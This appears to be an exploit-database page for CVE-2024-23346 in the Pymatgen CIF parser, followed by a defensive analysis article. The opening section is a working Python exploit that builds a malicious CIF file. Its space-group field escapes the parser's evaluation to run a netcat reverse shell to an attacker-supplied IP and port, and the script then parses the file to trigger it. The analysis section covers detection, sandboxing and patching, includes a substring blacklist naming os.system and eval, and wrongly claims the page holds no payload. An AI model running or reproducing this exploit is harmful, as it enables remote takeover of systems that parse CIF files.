Pymatgen 2024.1 - Remote Code Execution (RCE)

Exploit Author: Mohammed Idrees Banyamer Analysis Author: www.bubbleslearn.ir Category: Remote Language: Python Published Date: 2025-04-15

# Exploit Title : Pymatgen 2024.1 - Remote Code Execution (RCE)
# Google Dork : (not applicable)
# Date : 2024-11-13
# Exploit Author : Mohammed Idrees Banyamer
# Vendor Homepage : https ://pymatgen.org
# Software Link : https ://pypi.org /project /pymatgen/
# Version : 2024.1
# Tested on : Kali Linux 2024.1
# CVE : CVE-2024-23346


import os

# Function to create the malicious CIF file
def create_malicious_cif(ip, port):
    # Constructing the malicious CIF file with reverse shell payload
    malicious_cif = f"""
data_5yOhtAoR
_audit_creation_date            2024-11-13
_audit_creation_method          "CVE-2024-23346 Pymatgen CIF Parser Reverse Shell Exploit"

loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]

_space_group_magn.transform_BNS_Pp_abc  'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("nc {ip} {port} -e /bin/bash");0,0,0'

_space_group_magn.number_BNS  62.448
_space_group_magn.name_BNS  "P  n'  m  a'  "
    """
    
    # Save to a file
    with open("vuln.cif", "w") as file:
        file.write(malicious_cif)
    print("[*] Malicious CIF file created: vuln.cif")

# Function to trigger the exploit by parsing the malicious CIF file
def exploit():
    ip = input("Enter your IP address for the reverse shell: ")
    port = input("Enter the port for the reverse shell to listen on: ")
    
    # Create the malicious CIF file
    create_malicious_cif(ip, port)
    
    # Trigger the Pymatgen CIF parser to parse the malicious file
    from pymatgen.io.cif import CifParser
    parser = CifParser("vuln.cif")
    structure = parser.parse_structures()

# Running the exploit
if __name__ == "__main__":
    exploit()

Pymatgen 2024.1 — Remote Code Execution (CVE-2024-23346): Analysis, Impact, and Mitigation

Pymatgen is a widely used Python library for materials analysis and file parsing (including CIF — Crystallographic Information File) in computational materials science. In 2024 a critical vulnerability (CVE-2024-23346) affecting Pymatgen 2024.1 was disclosed that could lead to remote code execution (RCE) when untrusted CIF input is parsed by vulnerable code paths. This article explains the issue at a high level, the practical impact, and effective defensive measures for users, administrators, and library authors.

Executive summary

Vulnerability type: remote code execution (RCE) triggered by specially crafted CIF files parsed by the Pymatgen CIF parser.
Affected versions: Pymatgen 2024.1 (and earlier releases that used the same unsafe parsing logic).
Impact: Arbitrary code execution under the privileges of the process running the parser.
Primary remediation: upgrade to a patched Pymatgen release; employ input sanitization, least-privilege execution, and environment isolation for untrusted inputs.

Technical overview (non-actionable)

At a high level, the root cause of this class of vulnerability is unsafe evaluation or interpretation of data embedded in CIF files. CIFs are text files that can contain structured metadata fields. If the parser evaluates or resolves arbitrary expressions or uses unprotected Python evaluation/deserialization on field values, a maliciously crafted field can cause execution of Python code in the parsing process.

For safety and ethical reasons this article does not contain proof-of-concept exploit payloads or parsing input that would reproduce the vulnerability. The goal here is to describe the problem and provide defensive guidance.

Why this matters — realistic attack scenarios

Automated pipelines: Research workflows or CI systems that automatically parse CIF files from external collaborators or public repositories could run the parser on untrusted data, giving an attacker a vector to run code on build servers.
Shared services: Web services that accept uploaded CIFs for visualization or analysis can be compromised if the parsing happens in-process without isolation.
Desktop research environments: A researcher opening a CIF from an unknown source could execute malicious code under their user account.

Vulnerability summary (recommended to include in inventories)

Item	Value
CVE	CVE-2024-23346
Product	Pymatgen (CIF parser)
Affected version	2024.1 (and versions using same unsafe parsing behavior)
Impact	Remote code execution (process-level)

Detection and indicators of compromise (defensive)

Detecting exploitation attempts or suspicious CIFs can reduce risk. Focus on high-level indicators rather than sharing dangerous patterns.

Unusual CIF metadata or unusually long/complex string fields in uploaded files — treat these as suspicious for manual review.
Unexpected child processes spawned from analysis/parsing services, or unexpected outbound network connections originating from a parser process.
New or unexpected files or changes made by the parser process, especially in directories where it normally does not write.
Elevated CPU or memory usage in parsing jobs, or parsing timeouts that are longer than typical.

Mitigation and best practices

Defensive controls should be layered: patching, input validation, isolation, monitoring, and secure coding practices.

1. Patch and upgrade

Primary action: upgrade Pymatgen to the vendor-supplied patched release as soon as it is available. Check the official project page and release notes for the exact fixed version.
If you are unable to upgrade immediately, apply other mitigations below (isolation, sanitization) until a patch can be installed.

2. Treat incoming CIFs as untrusted data

Do not parse CIF files from untrusted sources in the same privileged process used for other work.
Implement size limits, field-length limits, and basic sanitization on upload.

3. Run parsers in isolation

Run parsing operations in a minimal-privilege environment. Options include:

Dedicated unprivileged user accounts or containers/VMs with network disabled.
Short-lived jobs that are resource-limited (CPU, memory, file-system access) and are killed after a timeout.
Server-side file handling in sandboxed containers (e.g., OCI containers, Firejail) or using language-level sandboxes where appropriate.

4. Defensive coding for library authors

Avoid executing or evaluating arbitrary expressions from file inputs (never call eval() on user-supplied data).
Prefer safe parsing functions (for Python, ast.literal_eval for limited expression evaluation of literals) and strict schema validation of CIF fields.
Adopt a whitelisting approach: only accept expected value types and patterns for each CIF tag.
Add fuzz and unit tests that simulate malicious inputs to ensure new releases do not regress.

5. Runtime monitoring and alerting

Monitor process activity: unexpected network connections or shell executions by parser processes should raise alerts.
Instrument parsers with logging of file sources and parse failures (avoid logging sensitive data).

Safe example: validate CIF text before parsing (pattern only)

# Example: simple, defensive pre-check (non-exploit code)
# This snippet demonstrates a non-executable, high-level approach:
#  - read the CIF as text
#  - reject if suspicious tokens appear
#  - then hand to the trusted parser

def is_suspicious_cif_text(text):
    # Simple whitelist/blacklist example: do not allow Python keywords or suspicious
    # control characters. Implement as part of a broader policy.
    blacklisted_substrings = ["__import__", "exec(", "eval(", "subprocess", "os.system"]
    for s in blacklisted_substrings:
        if s in text:
            return True
    return False

def safe_parse_cif(file_path, parser_callable):
    with open(file_path, "r", encoding="utf-8", errors="replace") as f:
        content = f.read()
    if is_suspicious_cif_text(content):
        raise ValueError("CIF content failed basic safety checks")
    # parser_callable should be the vetted Pymatgen parser AFTER upgrading to patched version
    return parser_callable(file_path)

Explanation: This illustrates a defensive pre-check for CIF text prior to parsing. It is intentionally conservative and simple — production deployments should use richer validation and run parsing inside an isolated execution environment.

Safe example: run parsing in a sandboxed subprocess

# High-level demonstration: run parser in a subprocess with timeouts and limited environment.
# Implementers should adapt to their OS and container tooling.

import subprocess, shlex, tempfile, os

def run_parser_safely(cmd, timeout=10):
    # cmd: a shell command invoking a parser inside a container or restricted environment
    # Example: use your container runtime to execute the parser
    proc = subprocess.run(shlex.split(cmd),
                          stdout=subprocess.PIPE,
                          stderr=subprocess.PIPE,
                          timeout=timeout,
                          check=False,
                          env={})  # minimal environment
    return proc.returncode, proc.stdout, proc.stderr

Explanation: This pattern runs parsing as an external process you control — so even if malicious input tries to trigger code execution, it will be contained to that process. Use proper containerization, filesystem and network restrictions, and OS resource limits in production.

Incident response checklist

If you suspect exploitation, isolate the affected host and preserve logs and samples of the CIF file(s).
Search for lateral movement indicators and unexpected processes spawned by user-level Python interpreters.
Upgrade your Pymatgen instances to the patched release and rotate any credentials or secrets that may have been accessible to the compromised environment.
Notify affected stakeholders and follow your organization’s breach response procedures.

Recommendations for research groups and service operators

Inventory all systems and pipelines that parse CIFs and determine whether Pymatgen 2024.1 (or other vulnerable versions) is used.
Schedule an immediate upgrade to a patched version or apply compensating controls if immediate upgrade is not possible.
Document data intake policies: only accept CIFs from trusted sources or run all untrusted inputs through the sandboxed pipeline.
Adopt a security review process for third-party libraries used in automated analysis pipelines.